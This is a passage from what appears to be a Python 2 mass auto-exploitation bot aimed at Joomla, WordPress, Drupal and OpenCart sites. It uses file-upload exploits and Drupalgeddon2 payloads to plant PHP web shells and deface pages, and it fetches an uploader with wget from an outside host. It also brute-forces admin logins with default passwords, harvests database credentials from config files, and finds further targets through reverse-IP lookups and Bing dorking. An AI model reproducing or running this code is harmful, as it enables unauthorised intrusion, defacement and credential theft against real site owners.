2994. if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
2995. self.Print_vuln_Config(site)
2996. with open('result/Config_results.txt', 'a') as ww:
2997. ww.write('Full Config Path : ' + Exp + '\n')
2998. try:
2999. Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
3000. Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
3001. Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
3002. Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
3003. with open('result/Config_results.txt', 'a') as ww:
3004. ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
3005. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
3006. 0] + '\n---------------------\n')
3007. except:
3008. self.Print_NotVuln('ungallery', site)
3009. else:
3010. self.Print_NotVuln('ungallery', site)
3011. except:
3012. self.Print_NotVuln('ungallery', site)
3013.  
3014.  
3015. def Com_extplorer(self, site):
3016. Check = requests.get('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
3017. timeout=10)
3018. if Check.status_code == 200 or Check.status_code == 500:
3019. IndeX = {'Filedata': open(self.Jce_Deface_image, 'rb')}
3020.  
3021. ShellFile = {'Filedata': open(self.ShellPresta, 'rb')}
3022. requests.post('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
3023. files=ShellFile, timeout=10)
3024. CheckShell = requests.get('http://' + site +
3025. '/images/stories/up.php', timeout=5)
3026.  
3027. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
3028. self.Print_vuln_Shell(site + '/images/stories/up.php')
3029. with open('result/Shell_results.txt', 'a') as writer:
3030. writer.write(site + '/images/stories/up.php\n')
3031. else:
3032. requests.post('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
3033. files=IndeX, timeout=10)
3034.  
3035. CheckIndex = requests.get('http://' + site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
3036. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
3037. self.Print_Vuln_index(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
3038. with open('result/Index_results.txt', 'a') as writer:
3039. writer.write(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1] + '\n')
3040. else:
3041. self.Print_NotVuln('Com_extplorer', site)
3042. else:
3043. self.Print_NotVuln('Com_extplorer', site)
3044.  
3045. def Com_jwallpapers_index(self, site):
3046. try:
3047. fileindex = {'file': open(self.Jce_Deface_image, 'rb')}
3048. post_data = {"name": self.Jce_Deface_image.split('/')[1],
3049. "submit": "Upload"}
3050. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
3051. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
3052. if '"jsonrpc"' in GoT.text.encode('utf-8'):
3053. Check = requests.get('http://' + site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1], timeout=5)
3054. if 'GIF89a' in Check.text.encode('utf-8'):
3055. self.Print_Vuln_index(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1])
3056. with open('result/Index_results.txt', 'a') as writer:
3057. writer.write(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1] + '\n')
3058. else:
3059. self.Print_NotVuln('Com_jwallpapers', site)
3060. except:
3061. self.Print_NotVuln('Com_jwallpapers', site)
3062.  
3063. def Com_jwallpapers_Shell(self, site):
3064. try:
3065. fileindex = {'file': open(self.indeX, 'rb')}
3066. post_data = {"name": "vuln.php",
3067. "submit": "Upload"}
3068. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
3069. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
3070. if '"jsonrpc"' in GoT.text.encode('utf-8'):
3071. requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=5)
3072. requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=5)
3073. Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=5)
3074. Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=5)
3075. Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=5)
3076. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
3077. CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
3078.  
3079. if 'Vuln!!' in Check.text.encode('utf-8'):
3080. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
3081. self.Print_vuln_Shell(site + '/images/vuln.php')
3082. with open('result/Shell_results.txt', 'a') as writer:
3083. writer.write(site + '/images/vuln.php' + '\n')
3084. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
3085. self.Print_Vuln_index(site + '/vuln.htm')
3086. with open('result/Index_results.txt', 'a') as writer:
3087. writer.write(site + '/vuln.htm' + '\n')
3088. else:
3089. self.Com_jwallpapers_index(site)
3090. elif 'Vuln!!' in Check2.text.encode('utf-8'):
3091. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
3092. self.Print_vuln_Shell(site + '/images/vuln.php')
3093. with open('result/Shell_results.txt', 'a') as writer:
3094. writer.write(site + '/images/vuln.php' + '\n')
3095. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
3096. self.Print_Vuln_index(site + '/vuln.htm')
3097. with open('result/Index_results.txt', 'a') as writer:
3098. writer.write(site + '/vuln.htm' + '\n')
3099. else:
3100. self.Com_jwallpapers_index(site)
3101. elif 'Vuln!!' in Check3.text.encode('utf-8'):
3102. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
3103. self.Print_vuln_Shell(site + '/images/vuln.php')
3104. with open('result/Shell_results.txt', 'a') as writer:
3105. writer.write(site + '/images/vuln.php' + '\n')
3106. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
3107. self.Print_Vuln_index(site + '/vuln.htm')
3108. with open('result/Index_results.txt', 'a') as writer:
3109. writer.write(site + '/vuln.htm' + '\n')
3110. else:
3111. self.Com_jwallpapers_index(site)
3112. else:
3113. self.Com_jwallpapers_index(site)
3114. except:
3115. self.Com_jwallpapers_index(site)
3116.  
3117.  
3118. def Com_facileforms(self, site):
3119. Check = requests.get('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
3120. timeout=10)
3121. if Check.status_code == 200 or Check.status_code == 500:
3122. IndeX = {'Filedata': open(self.Jce_Deface_image, 'rb')}
3123. ShellFile = {'Filedata': open(self.ShellPresta, 'rb')}
3124. Datapost = {'folder': '/components/com_facileforms/libraries/jquery/'}
3125. requests.post('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
3126. files=ShellFile, data=Datapost, timeout=10)
3127. CheckShell = requests.get('http://' + site +
3128. '/components/com_facileforms/libraries/jquery/up.php', timeout=5)
3129.  
3130. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
3131. self.Print_vuln_Shell(site + '/components/com_facileforms/libraries/jquery/up.php')
3132. with open('result/Shell_results.txt', 'a') as writer:
3133. writer.write(site + '/components/com_facileforms/libraries/jquery/up.php\n')
3134. else:
3135. requests.post('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
3136. files=IndeX, data=Datapost, timeout=10)
3137.  
3138. CheckIndex = requests.get('http://' + site + '/components/com_facileforms/libraries/jquery/'
3139. + self.Jce_Deface_image.split('/')[1])
3140. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
3141. self.Print_Vuln_index(site + '/components/com_facileforms/libraries/jquery/'
3142. + self.Jce_Deface_image.split('/')[1])
3143. with open('result/Index_results.txt', 'a') as writer:
3144. writer.write(site + '/components/com_facileforms/libraries/jquery/'
3145. + self.Jce_Deface_image.split('/')[1] + '\n')
3146. else:
3147. self.Print_NotVuln('Com_facileforms', site)
3148. else:
3149. self.Print_NotVuln('Com_facileforms', site)
3150.  
3151. def barclaycart(self, site):
3152. try:
3153. ShellFile = {'Filedata': (self.pagelinesExploitShell, open(self.pagelinesExploitShell, 'rb')
3154. , 'multipart/form-data')}
3155. Exp = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/uploadify.php'
3156. requests.post(Exp, files=ShellFile, timeout=5)
3157. Shell = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/' \
3158. + self.pagelinesExploitShell.split('/')[1]
3159. GoT = requests.get(Shell, timeout=5)
3160. if GoT.status_code == 200:
3161. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
3162. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
3163. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
3164. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
3165. with open('result/Shell_results.txt', 'a') as writer:
3166. writer.write(site + '/wp-content/vuln.php' + '\n')
3167. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
3168. self.Print_Vuln_index(site + '/vuln.htm')
3169. with open('result/Index_results.txt', 'a') as writer:
3170. writer.write(site + '/vuln.htm' + '\n')
3171. else:
3172. self.Print_NotVuln('barclaycart plugin', site)
3173. else:
3174. self.Print_NotVuln('barclaycart plugin', site)
3175. except:
3176. self.Print_NotVuln('barclaycart plugin', site)
3177.  
3178.  
3179.  
3180. class DrupalGedden2(object):
3181. def __init__(self, site):
3182. self.r = '\033[31m'
3183. self.g = '\033[32m'
3184. self.y = '\033[33m'
3185. self.b = '\033[34m'
3186. self.m = '\033[35m'
3187. self.c = '\033[36m'
3188. self.w = '\033[37m'
3189. self.rr = '\033[39m'
3190. try:
3191. CheckVersion = requests.get('http://' + site, timeout=5)
3192. if 'content="Drupal 7' in CheckVersion.text.encode('utf-8'):
3193. self.Version7Drupal(site)
3194. elif 'content="Drupal 8' in CheckVersion.text.encode('utf-8'):
3195. self.Version8Drupal(site)
3196. else:
3197. self.Version7Drupal(site)
3198. except:
3199. self.Print_NotVuln('Drupalgeddon2', site)
3200.  
3201. def Print_NotVuln(self, NameVuln, site):
3202. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
3203.  
3204. def Print_Vuln_index(self, indexPath):
3205. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
3206.  
3207. def Print_vuln_Shell(self, shellPath):
3208. print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
3209.  
3210. def Version7Drupal(self, site):
3211. try:
3212. payloadshell = "Vuln!!<?php system($_GET['cmd']); ?>"
3213. PrivatePAyLoad = "echo 'Vuln!! patch it Now!' > vuln.htm;" \
3214. " echo '" + payloadshell + "'> sites/default/files/vuln.php;" \
3215. " echo '" + payloadshell + "'> vuln.php;" \
3216. " cd sites/default/files/;" \
3217. " echo 'AddType application/x-httpd-php .jpg' > .htaccess;" \
3218. " wget 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php'"
3219. get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru',
3220. 'name[#markup]': PrivatePAyLoad, 'name[#type]': 'markup'}
3221. post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'}
3222.  
3223. r = requests.post('http://' + site, data=post_params, params=get_params)
3224. m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
3225. if m:
3226. found = m.group(1)
3227. get_params = {'q': 'file/ajax/name/#value/' + found}
3228. post_params = {'form_build_id': found}
3229. requests.post('http://' + site, data=post_params, params=get_params)
3230. a = requests.get('http://' + site + '/sites/default/files/vuln.php', timeout=5)
3231. if 'Vuln!!' in a.text.encode('utf-8'):
3232. self.Print_vuln_Shell(site + '/sites/default/files/vuln.php?cmd=id')
3233. with open('result/Shell_results.txt', 'a') as writer:
3234. writer.write(site + '/sites/default/files/vuln.php?cmd=id' + '\n')
3235. gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
3236. CheckUploader = requests.get('http://' + site + '/sites/default/files/up.php', timeout=5)
3237. if 'Vuln!!' in CheckUploader.text.encode('utf-8'):
3238. self.Print_vuln_Shell(site + '/sites/default/files/up.php')
3239. with open('result/Shell_results.txt', 'a') as writer:
3240. writer.write(site + '/sites/default/files/up.php' + '\n')
3241. if 'Vuln!!' in gg.text.encode('utf-8'):
3242. self.Print_Vuln_index(site + '/vuln.htm')
3243. with open('result/Index_results.txt', 'a') as writer:
3244. writer.write(site + '/vuln.htm' + '\n')
3245. else:
3246. gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
3247. if 'Vuln!!' in gg.text.encode('utf-8'):
3248. self.Print_Vuln_index(site + '/vuln.htm')
3249. with open('result/Index_results.txt', 'a') as writer:
3250. writer.write(site + '/vuln.htm' + '\n')
3251. Checkshell = requests.get('http://' + site + '/vuln.php', timeout=5)
3252. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
3253. self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
3254. with open('result/Shell_results.txt', 'a') as writer:
3255. writer.write(site + '/vuln.php?cmd=id' + '\n')
3256. else:
3257. self.Print_NotVuln('Drupalgeddon2', site)
3258. else:
3259. self.Print_NotVuln('Drupalgeddon2', site)
3260. except:
3261. self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
3262.  
3263. def Version8Drupal(self, site):
3264. try:
3265. Exp = site + '/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
3266. payloadshell = "<?php system($_GET['cmd']); ?>"
3267.  
3268. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
3269. 'mail[#type]': 'markup', 'mail[#markup]': 'echo Vuln!! patch it Now!> vuln.htm'}
3270.  
3271. payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
3272. 'mail[#type]': 'markup', 'mail[#markup]': 'echo "' + payloadshell + '"> vuln.php'}
3273. r = requests.post('http://' + Exp, data=payload, timeout=5)
3274. if r.status_code == 200:
3275. a = requests.get('http://' + site + '/vuln.htm', timeout=5)
3276. if 'Vuln!!' in a.text.encode('utf-8'):
3277. requests.post('http://' + Exp, data=payload2, timeout=5)
3278. CheckShell = requests.get('http://' + site + '/vuln.php', timeout=5)
3279. if CheckShell.status_code == 200:
3280. self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
3281. with open('result/Shell_results.txt', 'a') as writer:
3282. writer.write(site + '/vuln.php?cmd=id' + '\n')
3283. self.Print_Vuln_index(site + '/vuln.htm')
3284. with open('result/Index_results.txt', 'a') as writer:
3285. writer.write(site + '/vuln.htm' + '\n')
3286. else:
3287. self.Print_Vuln_index(site + '/vuln.htm')
3288. with open('result/Index_results.txt', 'a') as writer:
3289. writer.write(site + '/vuln.htm' + '\n')
3290. else:
3291. self.Print_NotVuln('Drupalgeddon2', site)
3292. else:
3293. self.Print_NotVuln('Drupalgeddon2', site)
3294. except:
3295. self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
3296.  
3297.  
3298.  
3299. class JooMLaBruteForce(object):
3300. def __init__(self, site):
3301. self.flag = 0
3302. self.r = '\033[31m'
3303. self.g = '\033[32m'
3304. self.y = '\033[33m'
3305. self.b = '\033[34m'
3306. self.m = '\033[35m'
3307. self.c = '\033[36m'
3308. self.w = '\033[37m'
3309. self.rr = '\033[39m'
3310. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
3311. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
3312. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
3313. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
3314. "12", "123123"]
3315. thread = []
3316. for passwd in self.password:
3317. t = threading.Thread(target=self.Joomla, args=(site, passwd))
3318. if self.flag == 0:
3319. break
3320. else:
3321. t.start()
3322. thread.append(t)
3323. time.sleep(0.08)
3324. for j in thread:
3325. j.join()
3326. if self.flag == 0:
3327. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
3328. + self.y + 'Joomla BruteForce' + self.c + ' [Not Vuln]'
3329.  
3330. def Joomla(self, site, passwd):
3331. try:
3332. sess = requests.session()
3333. GetToken = sess.get('http://' + site + '/administrator/index.php', timeout=5)
3334. try:
3335. ToKeN = re.findall('type="hidden" name="(.*)" value="1"',
3336. GetToken.text.encode('utf-8'))[0]
3337. GeTOPtIoN = re.findall('type="hidden" name="option" value="(.*)"', GetToken.text.encode('utf-8'))[0]
3338. except:
3339. ToKeN = ''
3340. GeTOPtIoN = 'com_login'
3341. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
3342. post = {}
3343. post['username'] = "admin"
3344. post['passwd'] = passwd
3345. post['lang'] = 'en-GB'
3346. post['option'] = GeTOPtIoN
3347. post['task'] = 'login'
3348. post[ToKeN] = '1'
3349. url = "http://" + site + "/administrator/index.php"
3350. GoT = sess.post(url, data=post, headers=agent, timeout=10)
3351. if 'logout' in GoT.text.encode('utf-8'):
3352. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
3353. self.r + site + ' ' + self.y + 'Joomla' + self.g + ' [Hacked!!]'
3354. with open('result/Joomla_Hacked.txt', 'a') as writer:
3355. writer.write('http://' + site + '/administrator/index.php' + '\n Username: admin' +
3356. '\n Password: ' + passwd + '\n-----------------------------------------\n')
3357. self.flag = 1
3358. except Exception, e:
3359. pass
3360.  
3361. class DrupalBruteForce(object):
3362. def __init__(self, site):
3363. self.flag = 0
3364. self.r = '\033[31m'
3365. self.g = '\033[32m'
3366. self.y = '\033[33m'
3367. self.b = '\033[34m'
3368. self.m = '\033[35m'
3369. self.c = '\033[36m'
3370. self.w = '\033[37m'
3371. self.rr = '\033[39m'
3372. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
3373. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
3374. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
3375. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
3376. "12", "123123"]
3377. thread = []
3378. for passwd in self.password:
3379. t = threading.Thread(target=self.Drupal, args=(site, passwd))
3380. if self.flag == 0:
3381. break
3382. else:
3383. t.start()
3384. thread.append(t)
3385. time.sleep(0.08)
3386. for j in thread:
3387. j.join()
3388. if self.flag == 0:
3389. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
3390. + self.y + 'Drupal BruteForce' + self.c + ' [Not Vuln]'
3391.  
3392. def Drupal(self, site, passwd):
3393. try:
3394. sess = requests.session()
3395. GetToken = sess.get('http://' + site + '/user/login', timeout=5)
3396. try:
3397. GetOP = re.findall('id="edit-submit" name="op" value="(.*)"',
3398. GetToken.text.encode('utf-8'))[0].split('"')[0]
3399. except:
3400. GetOP = 'Log in'
3401. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
3402. post = {}
3403. post['name'] = "admin"
3404. post['pass'] = passwd
3405. post['form_id'] = 'user_login'
3406. post['op'] = GetOP
3407. url = "http://" + site + "/user/login"
3408. GoT = sess.post(url, data=post, headers=agent, timeout=10)
3409. if 'Log out' in GoT.text.encode('utf-8'):
3410. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
3411. self.r + site + ' ' + self.y + 'Drupal' + self.g + ' [Hacked!!]'
3412. with open('result/Drupal_Hacked.txt', 'a') as writer:
3413. writer.write('http://' + site + '/user/login' + '\n Username: admin' + '\n Password: ' +
3414. passwd + '\n-----------------------------------------\n')
3415. self.flag = 1
3416.  
3417. except Exception, e:
3418. pass
3419.  
3420. class OpenCart(object):
3421. def __init__(self, site):
3422. self.flag = 0
3423. self.r = '\033[31m'
3424. self.g = '\033[32m'
3425. self.y = '\033[33m'
3426. self.b = '\033[34m'
3427. self.m = '\033[35m'
3428. self.c = '\033[36m'
3429. self.w = '\033[37m'
3430. self.rr = '\033[39m'
3431. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
3432. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
3433. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
3434. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
3435. "12", "123123"]
3436. thread = []
3437. for passwd in self.password:
3438. t = threading.Thread(target=self.opencart, args=(site, passwd))
3439. if self.flag == 0:
3440. break
3441. else:
3442. t.start()
3443. thread.append(t)
3444. time.sleep(0.08)
3445. for j in thread:
3446. j.join()
3447. if self.flag == 0:
3448. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
3449. + self.y + 'OpenCart' + self.c + ' [Not Vuln]'
3450.  
3451. def opencart(self, site, passwd):
3452. try:
3453. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
3454. post = {}
3455. post['username'] = "admin"
3456. post['password'] = passwd
3457. url = "http://" + site + "/admin/index.php"
3458. GoT = requests.post(url, data=post, headers=agent, timeout=10)
3459. if 'Logout' in GoT.text.encode('utf-8'):
3460. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
3461. self.r + site + ' ' + self.y + 'OpenCart' + self.g + ' [Hacked!!]'
3462. with open('result/OpenCart_Hacked.txt', 'a') as writer:
3463. writer.write('http://' + site + '/admin/index.php' + '\n Username: admin' + '\n Password: ' +
3464. passwd + '\n-----------------------------------------\n')
3465. self.flag = 1
3466. except Exception, e:
3467. pass
3468.  
3469.  
3470.  
3471. class reverse_ipz(object):
3472. def __init__(self):
3473. self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
3474. 'Accept': '*/*'}
3475. def Reverse_ip(self, domain_Or_ipAddress):
3476.  
3477. Check = domain_Or_ipAddress
3478. if Check.startswith("http://"):
3479. Check = Check.replace("http://", "")
3480. elif Check.startswith("https://"):
3481. Check = Check.replace("https://", "")
3482. else:
3483. pass
3484. try:
3485. self.ip = socket.gethostbyname(Check)
3486. except:
3487. sys.exit()
3488. Rev = requests.get(binascii.a2b_base64('aHR0cDovL3ZpZXdkbnMuaW5mby9yZXZlcnNlaXAvP2hvc3Q9') + self.ip + '&t=1',
3489. headers=self.headers, timeout=5)
3490. Revlist = re.findall('<tr> <td>((([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}))</td>', Rev.text)
3491. if len(Revlist) == 1000:
3492. for url in Revlist:
3493. with open('logs/' + self.ip + 'x.txt', 'a') as xx:
3494. xx.write(str(url[0]) + '\n')
3495. gotoBing = BingDorker()
3496. gotoBing.ip_bing(self.ip)
3497. else:
3498. for url in Revlist:
3499. with open('logs/' + self.ip + '.txt', 'a') as xx:
3500. xx.write(str(url[0]) + '\n')
3501.  
3502.  
3503. class BingDorker(object):
3504. def ip_bing(self, __ip):
3505. try:
3506. if __ip.startswith("http://"):
3507. __ip = __ip.replace("http://", "")
3508. elif __ip.startswith("https://"):
3509. __ip = __ip.replace("https://", "")
3510. else:
3511. pass
3512. try:
3513. ip = socket.gethostbyname(__ip)
3514. except:
3515. sys.exit()
3516. next = 0
3517. while next <= 500:
3518. url = "http://www.bing.com/search?q=ip%3A" + ip + "&first=" + str(next) + "&FORM=PORE"
3519. sess = requests.session()
3520. cnn = sess.get(url, timeout=5)
3521. next = next + 10
3522. finder = re.findall(
3523. '<h2><a href="((?:https://|http://)[a-zA-Z0-9-_]+\.*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11})',
3524. cnn.text)
3525. for url in finder:
3526. if url.startswith('http://'):
3527. url = url.replace('http://', '')
3528. elif url.startswith('https://'):
3529. url = url.replace('https://', '')
3530. else:
3531. pass
3532. with open("logs/" + ip + "x.txt", 'a') as f:
3533. if 'go.microsoft.com' in url:
3534. pass
3535. else:
3536. f.write(str(url + '\n'))
3537. lines = open("logs/" + ip + "x.txt", 'r').read().splitlines()
3538. lines_set = set(lines)
3539. count = 0
3540. for line in lines_set:
3541. with open("logs/" + ip + ".txt", 'a') as xx:
3542. count = count + 1
3543. xx.write(line + '\n')
3544. os.unlink("logs/" + ip + "x.txt")
3545. except IOError:
3546. sys.exit()
3547. except IndexError:
3548. sys.exit()
3549.  
3550.  
3551. Rock = AutoExploiter()